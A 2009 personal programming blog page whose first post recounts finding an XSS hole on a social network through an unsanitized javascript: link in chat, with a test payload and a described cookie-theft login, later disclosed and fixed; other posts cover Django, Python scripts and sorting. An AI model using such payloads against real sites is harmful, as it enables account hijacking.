David Ziegler's personal blog of computing, math, and other heroic achievements.


07 Jul 2009

I Found A Surprisingly Simple XSS Hack

So the other day, I was bored and told a friend of mine that I would try to hack into one of her accounts. I didn’t have a particularly good reason for this, I mainly just wanted to see if I could. She suggested a prominent social networking site which I’ll call X.com.

First, a little a background and disclaimer. The only reason I’m describing this exploit is because as soon as I discovered it, I emailed the site admins and they fixed it within a few hours. This post is intended for educational purposes and to help others make sure that their own sites are secure.

I figured I would try an XSS attack using their instant messaging system, because I knew that they allowed certain tags like <a> and <i> in messages. Basically with an XSS attack, if I’m able to inject my own javascript into your browser, the game is over and I win.

So, the first thing I tried was sending her this message:

Hey, what's up? <script>alert('test')</script>

which unsurprisingly, was sanitized to just:

Hey, what's up?
I knew <img> tags wouldn’t work, so the next thing I tried was
Hey, what's up? Click this <a href="javascript:alert('test')">link</a>

And to my surprise, this did not get sanitized! Meaning that she saw this:

Hey, what's up? Click this link
If you click that link, a little harmless alert box will pop up. Why is that a big deal? Well, if I replace alert with a function to grab her X.com cookie string, and send that string to one of my servers in an ajax request, then I can log in with her account. And just to be sure, I did just that, and was able to sign in as her.

So what’s the moral? Well, the people at X.com are certainly not stupid, but it was a little scary to find out that the second most simple XSS attack I could think of worked on a pretty prominent social networking site. I contacted one of the engineers about this and according to him, the backend was sanitizing the HTML properly, but one of the designers used an unescapeHTML function to support simple styles like <b> and <i>, unknowingly creating this vulnerability. Anytime you unescape HTML, especially when it comes from users, you better be really really sure you know what you’re doing!

Also, this reminded me that a lot of Django developers rely on Django to autoescape their templates. During ajax requests though, if you’re just passing a dictionary of variables back as JSON, make sure that any strings you’re passing back are getting sanitized! Unless the strings are being obtained via render_to_string or something, they’re probably not autoescaped, so just be aware.

Comments (View)

06 Jul 2009

Django-css Version 2 is out

I just released version 2 of Django-css, and it’s on github now.

http://github.com/dziegler/django-css/tree/master

This is a significant departure from version 1 because it uses django_compressor rather than django-compress to do compression and versioning. As a result, it’s much easier to use and setup.

Usage is virtually identical to django_compressor, except you can also include HSS, Sass, CleverCSS, etc files in addition to just CSS. For example:

{% compress css xhtml %}
<link rel="stylesheet" href="{{MEDIA_URL}}css/reset.css" type="text/css" charset="utf-8" />
<link rel="stylesheet" href="{{MEDIA_URL}}css/base.ccss" type="text/css" charset="utf-8" />
{% endcompress %}
will render something like
<link rel="stylesheet" href="/static/CACHE/css/f7c661b7a124.css"
    type="text/css" media="all" charset="utf-8" />
(be sure to use the xhtml argument if you’re using xhtml, otherwise <link> won’t self-close). The only additional piece of work you need is something like this in your settings file:
COMPILER_FORMATS = {
    '.sass': {
        'binary_path':'sass',
        'arguments': '*.sass *.css'
    },
    '.hss': {
        'binary_path':'/home/dziegler/hss',
        'arguments':'*.hss'
    },
    '.ccss': {
        'binary_path':'clevercss',
        'arguments': '*.ccss'
    },
}

to tell django-css where to find your css compiler binaries, and how to pass it arguments.

If you’re not familiar with django_compressor, it’s basically a more elegant django-compress. From the django_compressor readme:

JS/CSS belong in the templates
Every static combiner for django I’ve seen makes you configure your static files in your settings.py. While that works, it doesn’t make sense. Static files are for display. And it’s not even an option if your settings are in completely different repositories and use different deploy processes from the templates that depend on them.
Flexibility
django_compressor doesn’t care if different pages use different combinations of statics. It doesn’t care if you use inline scripts or styles. It doesn’t get in the way.
Automatic regeneration and cache-foreverable generated output
Statics are never stale and browsers can be told to cache the output forever.

So now you include your css/js in templates, where they belong. Also, with django-compress you have to play around with a bunch of settings variables that not even I totally understand to get your versioning to work correctly. With django_compress if you want to update your compressed and versioned css/js, just flush the cache. During development you’re probably using

CACHE_BACKEND = 'dumy:///'
so it should automatically be updated.

Here is my nightmarish settings configuration with django-css version 1:

# django_css
COMPILER_FORMATS = {
    '.ccss': {
        'binary_path': 'clevercss',
        'arguments': 'SOURCE_FILENAME.ccss'
    }
}
COMPRESS_YUI_BINARY = os.path.join('java -jar '+PROJECT_PATH,'yuicompressor-2.4.2.jar')
COMPRESS=False
COMPRESS_CSS = {
    'css': {
        'source_filenames': ('css/reset.css','css/base.ccss','css/thickbox.css',
                             'css/uni-form-generic.css','css/uni-form.css',
                             'css/jquery-ui-1.7.2.custom.css',
                             'css/jquery.rating.css'),
        'output_filename': 'css/all_compressed.r?.css'
    },
    'iefix_css': {
        'source_filenames': ('css/iefix.ccss',),
        'output_filename': 'css/iefix_compressed.r?.css'
    }
}
COMPRESS_JS = {
    'js': {
        'source_filenames': ('js/json2.js','js/jquery.corners.min.js',
                             'js/jquery.form.js','js/thickbox.js','js/uni-form.jquery.js',
                             'js/jquery.MetaData.js','js/jquery.rating.js',
                             'js/jquery-ui-1.7.2.custom.min.js',
                             'js/base.js'),
        'output_filename': 'js/all_compressed.r?.js'
    }
}
COMPRESS_AUTO = True
COMPRESS_VERSION = True 
COMPRESS_CSS_FILTERS = ('django_css.filters.yui.YUICompressorFilter',)
COMPRESS_JS_FILTERS = ('django_css.filters.yui.YUICompressorFilter',)

and with django-css version 2:

# django_css
COMPILER_FORMATS = {
    '.ccss': {
        'binary_path':'clevercss',
        'arguments': '*.ccss'
    },
}
COMPRESS_YUI_BINARY = os.path.join('java -jar '+PROJECT_PATH,'yuicompressor-2.4.2.jar')
COMPRESS_CSS_FILTERS = ('compressor.filters.yui.YUICSSFilter',)
COMPRESS_JS_FILTERS = ('compressor.filters.yui.YUIJSFilter',)

So, I think this is a pretty big improvement. As always, feel free to send me any suggestions, comments, or questions. Plus, now that it’s on github you can fork or push changes.

Comments (View)

11 Jun 2009

A Python Script to Automatically Extract Excerpts From Articles

I recently had to write a script that takes a link to an article and returns a title and brief excerpt or description of that article. Ideally, the excerpt should be the first few sentences from the body of the article.

The first thing I struggled with was something I thought would be trivial: fetching the contents of the webpage.

>>> import httplib2
>>> http=httplib2.Http()
>>> status,response=http.request("http://www.mercurynews.com/karendsouza/ci_12510394")
>>> print response
''
>>> print status['status']
'200'

Ugh. Why is the response empty but the status code is 200? Well, for some reason even though we’re not logging in, this page requires that you accept a cookie and then redirects you, but doesn’t provide a 304 request so httplib2 knows to follow. So, the simplest solution was to ditch httplib2 and use urllib2 and cookielib (by the way, what’s with having urllib, urllib2, httplib, and httplib2?)

import urllib2
import cookielib
>>> cj = cookielib.CookieJar()
>>> opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
>>> doc = opener.open(url).read()

Once we have the contents of the page, we load everything into BeautifulSoup and make sure that we have some valid HTML. cleanSoup is just a helper function to filter out HTML that I’m not interested in or could munge up my results.

from BeautifulSoup import *
import re

def cleanSoup(soup):
    # get rid of javascript, noscript and css
    [[tree.extract() for tree in soup(elem)] for elem in ('script','noscript','style')]
    # get rid of doctype
    subtree = soup.findAll(text=re.compile("DOCTYPE"))
    [tree.extract() for tree in subtree]
    # get rid of comments
    comments = soup.findAll(text=lambda text:isinstance(text,Comment))
    [comment.extract() for comment in comments]
    return soup
soup = cleanSoup(BeautifulSoup(doc,parseOnlyThese=SoupStrainer('head')))

if not soup.get_starttag_text():
    print "Invalid input"
    return None
try:
    title = soup.head.title.string
except:
    title = None

description = ''
for meta in soup.findAll('meta'):
    if 'description' == meta.get('name', '').lower():
        description = meta['content']
        break

Getting the title is easy, and it seems to be a pretty safe assumption that every page has a title defined in head. Sometimes you’ll get lucky and a description will exist in the meta tag, and bam, you’re done. More often than not though, you’ll have to come up with a method to parse the HTML and figure out which part of that is the article you’re interested in. I tried a couple of different approaches and this one seemed to produce the best results for its relative simplicity. I considered some natural language parsing and machine learning methods, but I really don’t have time to build something that complicated for this project.

def removeHeaders(soup):
    [[tree.extract() for tree in soup(elem)] for elem in ('h1','h2','h3','h4','h5','h6')]
    return soup
if not description:
    soup = removeHeaders(cleanSoup(BeautifulSoup(doc,parseOnlyThese=SoupStrainer('body'))))
    text = ''.join(soup.findAll(text=True)).split('\n')
    description = max((len(i.strip()),i) for i in text)[1].strip()[0:255]
return (title, description)

First I parse out all the text from <body> and remove h1, h2, etc headers because they’re likely to contain information like the title, author, date, etc that are not part of the body of the article. Thankfully, BeautifulSoup does most of the heavy lifting here. I then try to merge adjacent paragraphs into one long string of text. You have to be careful when joining bodies of text together, because if you branch too far out, you end up merging in junk text. Then the first 255 characters of the longest resulting string of text are returned as the article excerpt. In most cases I found that this does a pretty good job of finding the first couple sentences from the article, or at least a reasonable excerpt.

Some examples are shown below. Facebook has a widget that does this too, so I included the output of Facebook’s widget as a comparison. If you have any ideas on how to improve this, I’d love to hear them.

http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2009/06/04/DD7V1806SV.DTL&type=performance

Me:

The blood-and-thunder tale of two idealistic but naive artists caught up in the repressive political machinery of Rome during the Napoleonic wars, “Tosca” comes around like clockwork in San Francisco (as it does to most opera companies). It always thrills

Facebook:

Puccini’s “Tosca” includes a number of surefire arias, and you can hear them sung vividly and well in the San Francisco Opera’s revival, which opened the company’s summer season at the War Memorial Opera House on Tuesday night.


http://www.chloeveltman.com/blog/2009/05/two-very-different-symphonies.html

Me:

The diversity of the Bay Area can be witnessed in many different ways, from the variety of the cuisine offered in its restaurants to the multitudinous kinds of topography. One less obvious way to explore the radical differences that coexist in this part o

Facebook:

Facebook actually doesn’t return a description for this page.


http://blogs.mercurynews.com/aei/2009/06/04/ramya-auroprem-joins-cast-of-spelling-bee/

Me:

How do you spell L-O-C-A-L P-R-I-D-E? Ramya Auroprem, of 2009 Scripps Spelling Bee fame, will get another shot in the spotlight on June 6. The San Jose schoolgirl will join the cast of San Jose Repertory Theatre’s “The 25th Annual Spelling Bee”

Facebook:

How do you spell L-O-C-A-L P-R-I-D-E? Ramya Auroprem, of 2009 Scripps Spelling Bee fame, will get another shot in the spotlight on June 6. The San Jose schoolgirl will join the cast of San Jose Repertory Theatre’s “The 25th Annual Spelling Bee” for the 3 p.m. performance. You go girl!


http://www.reason.com/news/show/134059.html

Me:

President Obama and his critics have a major disagreement. He says his accelerated economic stimulus efforts will create 600,000 jobs by the end of the summer. Senate Republican Leader Mitch McConnell of Kentucky, however, doubts “the spending binge

Facebook:

President Obama and his critics have a major disagreement. He says his accelerated economic stimulus efforts will create 600,000 jobs by the end of the summer. Senate Republican Leader Mitch McConnell

Update: Now on github http://github.com/dziegler/excerpt_extractor/tree/master
Thanks for the DRY suggestions to make the code prettier.

Comments (View)

16 May 2009

I’m 25 Today

Until a man is twenty-five, he still thinks, every so often, that under the right circumstances he could be the baddest motherfucker in the world. If I moved to a martial-arts monastery in China and studied real hard for ten years. If my family was wiped out by Colombian drug dealers and I swore myself to revenge. If I got a fatal disease, had one year to live, devoted it to wiping out street crime. If I just dropped out and devoted my life to being bad.

— Neal Stephenson (Snow Crash)

Sorry, but I still believe this is true.

Comments (View)

13 May 2009

See Which Twitterers Don’t Follow You Back In Less Than 14 Lines of Python

UPDATED (1/8/10): See Which Twitterers Don’t Follow You Back (updated)

All right, so I totally stole this from See Which Twitterers Don’t Follow You Back In Less Than 15 Lines of Ruby. Basically, if you have some bizarre desire to see who doesn’t reciprocate your follows on Twitter, or you just like to feel unpopular, I have the script for you.

I have no idea what practical application this might have, but I’m going to be using Twitter for a development project and I thought this would be a nice way to get my feet wet with the API. Also, everyone loves a good Python vs Ruby shootout :)

There’s a couple of Twitter API clients written in python, but python-twitter seems to be the most popular. To install just do

$ easy_install python-twitter

or check out the subversion repository if you want the latest source release. To be honest, I was a little disappointed that it lacked some basic features, like having the friend and follower count be attributes of a Twitter user object. If the Rubyists can have them with twitter gem, why can’t we? Anyway, here’s the code:

import twitter, sys, getpass, os

def call_api(username,password):
    api = twitter.Api(username,password)
    friends = api.GetFriends()
    followers = api.GetFollowers()
    heathens = filter(lambda x: x not in followers,friends)
    print "There are %i people you follow who do not follow you:" % len(heathens)
    for heathen in heathens:
        print heathen.screen_name
        
if __name__ == "__main__":
    password = getpass.getpass()
    call_api(sys.argv[1], password)

You can see that I added some convenience functions so you can run this script from the command line. If you took these out you could get it down to 8 lines, but whatever. I’m not a big fan of leaving my passwords lying around in plain text files, so I use the getpass module to hide my password as I type it into the command line. To run the script, just do

$ python twit_heathens.py <twitter-username>

Running the program looks like this:

$ python twit_heathens.py david_ziegler
Password: 
There are 9 people you follow who do not follow you:
leahculver
boxee
boxee_bd
jeresig
sunlightlabs
venturehacks
djangolinks
lushwhip
thefo0

And bam, you can see all the people who are too cool to follow you on Twitter. If you want, you can download the script here: http://filer.case.edu/~dez4/twit_heathens.py

Comments (View)

13 May 2009

Sorting a List of Dictionaries in Python

Sorting a list of dictionaries by the values of some key is something that comes up pretty frequently for me. Basically, you have a list of dictionaries that you want sorted by some particular key. So if we have

[{'name': 'Bert', 'age':24}, {'name': 'Adam', 'age': 27}, {'name': 'Claire', 'age': 25}]

and we wanted to sort by age, we would get

[{'name': 'Bert', 'age':24}, {'name': 'Claire', 'age': 25}, {'name': 'Adam', 'age': 27}]

Lots of people ask this question and there’s a ton of different solutions out there. I had some free time so I decided to test them out.

Setup

from random import random
d = [dict([(j,random()) for j in xrange(10)]) for i in xrange(500000)]

This generates an unsorted list of 500000 dictionaries, with each dictionary having 10 key/value pairs. The value for each key is drawn from a uniform distribution.

Python has two builtin methods for sorting lists. If you don’t need the original list, use list.sort() since it’s slightly more efficient. If you want to keep the original list, use sorted(list). I ran the following experiments using both.

Method 1

def compare_by(fieldname):
    def compare_two_dicts (a, b):
        return cmp(a[fieldname], b[fieldname])
    return compare_two_dicts

d.sort(compare_by(KEY))
>>> 8.720021 seconds

d = sorted(d,compare_by(KEY))
>>> 9.655032 seconds

I found this method here and in terms of performance and elegance, comes up as the worst of the ones I surveyed.

Method 2

d.sort(lambda x,y : cmp(x[KEY], y[KEY]))
>>> 8.667607 seconds

d = sorted(d, lambda x,y : cmp(x[KEY], y[KEY]))
>>> 9.260699 seconds

This is a little more efficient because it removes some unnecessary function calls, but we can do much better.

Method 3

d.sort(key=lambda k:k[KEY])
>>> 1.803021 seconds

d = sorted(d,key=lambda k:k[KEY])
>>> 1.810326 seconds

This uses the key parameter that was built into in the sort functions starting with python 2.4, which kind of excuses the previous methods because I believe they were written prior to 2.4.

Method 4

from operator import itemgetter
d.sort(key=itemgetter(KEY))
>>> 1.673376 seconds

d = sorted(d,key=itemgetter(KEY))
>>> 1.656095 seconds

Using itemgetter is faster than lambda because it’s written in C, but I personally find the lambda method a little easier to grok. If speed is your thing though, use itemgetter.

You can find the code I used to run these experiments here: http://filer.case.edu/~dez4/sort.py

Comments (View)

28 Apr 2009

Gray Hat Python

Just ordered my copy of Gray Hat Python from Amazon last night. Here’s the full description of the book:

Gray Hat Python: Python Programming for Hackers and Reverse Engineers

Python is fast becoming the programming language of choice for hackers, reverse engineers, and software testers because it’s easy to write quickly, and it has the low-level support and libraries that make hackers happy. But until now, there has been no real manual on how to use Python for a variety of hacking tasks. You had to dig through forum posts and man pages, endlessly tweaking your own code to get everything working. Not anymore.

Gray Hat Python explains the concepts behind hacking tools and techniques like debuggers, trojans, fuzzers, and emulators. But author Justin Seitz goes beyond theory, showing you how to harness existing Python-based security tools - and how to build your own when the pre-built ones won’t cut it.

You’ll learn how to:

  • Automate tedious reversing and security tasks
  • Design and program your own debugger
  • Learn how to fuzz Windows drivers and create powerful fuzzers from scratch
  • Have fun with code and library injection, soft and hard hooking techniques, and other software trickery
  • Sniff secure traffic out of an encrypted web browser session
  • Use PyDBG, Immunity Debugger, Sulley, IDAPython, PyEMU, and more

The world’s best hackers are using Python to do their handiwork. Shouldn’t you?

It looks pretty cool, although I think javascript is really the language of choice these days since XSS exploits are so easy to find. But hey, I love python and I could always use a brush up on secure computing. Anyways, I’ll post a review once I’ve gotten a chance to look through it.

Comments (View)

27 Apr 2009

Solution to the XKCD “Substitute” velociraptor problem

So, my friend Huaizhi Chen is a huge nerd and one of the smartest guys I know. Because he is simultaneously lame and cool, he spent his Friday night solving Problem #2 in the following XKCD comic:

substitute

I saw this solution: http://www.mbeckler.org/velociraptors/velociraptors.html but it relies on genetic programming/evolutionary algorithms, which is slower and doesn’t necessarily guarantee an optimal solution. Huaizhi uses a numeric differential equation solver to get approximately the same solution, which I find to be a much more elegant and we know it’s optimal.

He kindly wrote up his solution and posted it here: http://sites.google.com/site/chnhzh/Home/velociraptor.pdf which you should check out. The final solution turns out to be 32.6 and 147.4 degrees north of the horizon. Pretty cool!

Comments (View)

20 Apr 2009

CleverCSS Fork

Since I’m using CleverCSS a lot now and it’s no longer maintained, I decided to fork it: http://github.com/dziegler/clevercss/tree/master

It contains several important bug fixes and if I have time I’ll try to add support for @ keywords like @media.

Comments (View)

Page 3 of 4